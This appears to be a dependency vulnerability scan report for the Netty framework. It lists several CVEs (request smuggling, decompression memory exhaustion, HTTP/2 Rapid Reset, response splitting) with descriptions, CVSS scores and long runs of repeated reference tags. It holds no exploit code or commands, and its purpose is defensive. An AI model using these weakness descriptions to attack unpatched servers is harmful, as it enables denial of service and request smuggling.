af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16869
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11612
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2020-11612] CWE-789: Uncontrolled Memory Allocation OSSIndex - https://github.com/netty/netty/issues/9924 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2023-44487
CISA Known Exploited Vulnerability: Product: IETF HTTP/2 Name: HTTP/2 Rapid Reset Attack Vulnerability Date Added: 2023-10-10 Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS). Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Due Date: 2023-10-31 Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - 
ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY 
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - 
PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - 
VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - BROKEN_LINK cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PATCH cve@mitre.org - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE cve@mitre.org - 
ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - 
MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - 
VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions:
CVE-2022-41915 (OSSINDEX)
Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeaders.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call, into a `remove()` call, and call `add()` in a loop over the iterator of values.
